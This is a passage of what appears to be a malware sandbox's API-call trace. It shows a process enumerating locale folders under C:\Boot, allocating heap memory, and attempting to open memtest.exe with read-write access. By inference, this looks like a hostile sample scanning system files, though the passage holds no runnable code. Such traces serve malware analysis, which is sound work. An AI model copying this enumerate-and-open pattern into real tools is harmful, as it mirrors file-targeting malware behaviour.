Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c98 [0178.463] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x16c) returned 0x6f5050 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c70 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279a0 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27bf8 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ab8 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27888 [0178.463] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27950 [0178.464] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0178.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.464] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0178.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0178.464] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xce3b5a40, ftLastWriteTime.dwHighDateTime=0x1d03f5f, nFileSizeHigh=0x0, nFileSizeLow=0x795b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0178.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0178.464] PathFindExtensionW (pszPath="C:\\Boot\\memtest.exe") returned=".exe" [0178.464] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.465] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0178.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x214) returned 0x2d2fc98 [0178.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0178.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0178.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27cc0 [0178.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27bd0 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c20 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27860 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27810 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27770 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27838 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27900 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a18 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ba8 [0178.466] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.466] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27950 [0178.466] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c98 [0178.466] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27888 [0178.467] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0178.467] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x310) returned 0x2d2feb8 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ab8 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27bf8 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279a0 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c70 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b80 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ec8 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ea0 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27e78 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27e50 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27e28 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27e00 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27dd8 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27db0 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27d88 [0178.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27d60 [0178.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27d38 [0178.468] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0178.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27888 [0178.468] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0178.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c98 [0178.468] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0178.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27950 [0178.468] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0178.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0178.468] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0178.468] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0178.468] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f360 [0178.469] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0178.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f438 | out: hHeap=0x6a0000) returned 1 [0178.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0178.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f438 | out: hHeap=0x6a0000) returned 1 [0178.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0178.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f438 | out: hHeap=0x6a0000) returned 1 [0178.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0178.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.471] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f438 | out: hHeap=0x6a0000) returned 1 [0178.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0178.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f438 | out: hHeap=0x6a0000) returned 1 [0178.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f438 [0178.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f438 | out: hHeap=0x6a0000) returned 1 [0178.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0178.474] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f18 [0178.474] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.474] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.476] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.478] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 